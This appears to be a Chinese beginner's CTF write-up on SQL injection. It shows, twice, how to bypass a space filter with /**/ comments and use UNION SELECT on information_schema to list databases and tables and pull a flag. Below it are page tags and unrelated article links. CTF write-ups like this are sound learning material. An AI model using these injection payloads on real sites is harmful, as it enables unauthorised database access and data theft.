分享一个简单的sql注入

所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。比如先前的很多*网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到sql注入攻击。

分别输入1,2,3有对应的结果

使用'会报错，于是

构造常用的sql语句：1' and '1'='1

没有反应试一试1' and '1'='2

还是没反应，工具提示，应该是过滤了什么，改一下sql语句试一试

1and1=1

可以显示东西，经过判断过滤了空格，我们使用/**/来代替空格

试一试1'/**/and/**/'1'='1

发现有结果了：

于是构建sql语句：

判断有那些数据库：

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到结果：

查看有哪些数据表：

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

发现了flag的表，我们猜测应该是在web1数据库中并且字段就是flag(其实就在本页面的数据库中)

故：

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

本人也是初学者，参考了许多大佬的wp 自己写出来后有什么错误的地方，希望大家指出，谢谢!

根据页面提示，到底过滤了什么东西?可以知道一定过滤了什么....

分别输入1,2,3有对应的结果

使用'会报错，于是

构造常用的sql语句：1' and '1'='1

没有反应试一试1' and '1'='2

还是没反应，工具提示，应该是过滤了什么，改一下sql语句试一试

1and1=1

可以显示东西，经过判断过滤了空格，我们使用/**/来代替空格

试一试1'/**/and/**/'1'='1

发现有结果了：

于是构建sql语句：

判断有那些数据库：

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以看到结果：

查看有哪些数据表：

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

发现了flag的表，我们猜测应该是在web1数据库中并且字段就是flag(其实就在本页面的数据库中)

故：

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

总结

以上所述是小编给大家介绍的一个简单的sql注入，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对网站的支持！

# sql  # 注入  # Java面试题解析之判断以及防止SQL注入  # SQL注入原理与解决方法代码示例  # 通过ibatis解决sql注入问题  # Win2003服务器防SQL注入神器--D盾_IIS防火墙  # Sql注入工具_动力节点Java学院整理  # Sql注入原理简介_动力节点Java学院整理  # 寻找sql注入的网站的方法(必看)  # Mybatis防止sql注入的实例  # Hibernate使用中防止SQL注入的几种方案  # 有效防止SQL注入的5种方法总结  # 关于SQL注入中文件读写的方法总结  # 深入了解SQL注入  # 表单  # 数据库中  # 是在  # 就在  # 可以看到  # 报错  # 本页面  # 小编  # 大佬  # 应该是  # 发现了  # 有什么  # 发现有  # 有哪些  # 在此  # 它是  # 这类  # 来代替  # 给大家  # 希望大家 

相关文章： 如何高效搭建专业期货交易平台网站？  如何快速配置高效服务器建站软件？  如何自己制作一个网站链接,如何制作一个企业网站，建设网站的基本步骤有哪些？  智能起名网站制作软件有哪些,制作logo的软件？  如何在IIS管理器中快速创建并配置网站？  建站之星×万网：智能建站系统+自助建站平台一键生成  如何用PHP工具快速搭建高效网站？  如何通过商城自助建站源码实现零基础高效建站？  建站之星各版本价格是多少？  c# 服务器GC和工作站GC的区别和设置  购物网站制作费用多少,开办网上购物网站，需要办理哪些手续？  一键制作网站软件下载安装,一键自动采集网页文档制作步骤？  大连企业网站制作公司,大连2025企业社保缴费网上缴费流程？  深圳网站制作费用多少钱,读秀，深圳文献港这样的网站很多只提供网上试读，但有些人只要提供试读的文章就能全篇下载，这个是怎么弄的？  北京的网站制作公司有哪些,哪个视频网站最好？  保定网站制作方案定制,保定招聘的渠道有哪些？找工作的人一般都去哪里看招聘信息？  网站制作公司排行榜,抖音怎样做个人官方网站  详解ASP.NET 生成二维码实例（采用ThoughtWorks.QRCode和QrCode.Net两种方式）  高防网站服务器：DDoS防御与BGP线路的AI智能防护方案  建站之星展会模板：智能建站与自助搭建高效解决方案  建站VPS选购需注意哪些关键参数？  如何选择适配移动端的WAP自助建站平台？  香港服务器租用费用高吗？如何避免常见误区？  简历在线制作网站免费版,如何创建个人简历？  建站之星上传入口如何快速找到？  Swift中switch语句区间和元组模式匹配  C++如何将C风格字符串（char*）转换为std::string？（代码示例）  html制作网站的步骤有哪些,iapp如何添加网页？  企业宣传片制作网站有哪些,传媒公司怎么找企业宣传片项目？  建站之星伪静态规则如何设置？  如何在宝塔面板中修改默认建站目录？  建站之星云端配置指南：模板选择与SEO优化一键生成  网站制作报价单模板图片,小松挖机官方网站报价？  早安海报制作网站推荐大全,企业早安海报怎么每天更换？  制作网站的过程怎么写,用凡科建站如何制作自己的网站？  建站主机是否等同于虚拟主机？  建站之星后台密码遗忘如何找回？  湖州网站制作公司有哪些,浙江中蓝新能源公司官网？  淘宝制作网站有哪些,淘宝网官网主页？  c# 在高并发下使用反射发射（Reflection.Emit）的性能  ,想在网上投简历，哪几个网站比较好？  常州自助建站：操作简便模板丰富，企业个人快速搭建网站  如何通过免费商城建站系统源码自定义网站主题与功能？  如何访问已购建站主机并解决登录问题？  高端云建站费用究竟需要多少预算？  攀枝花网站建设,攀枝花营业执照网上怎么年审？  建站之星IIS配置教程：代码生成技巧与站点搭建指南  网站制作多少钱一个,建一个论坛网站大约需要多少钱？  公司门户网站制作公司有哪些,怎样使用wordpress制作一个企业网站？  如何通过远程VPS快速搭建个人网站？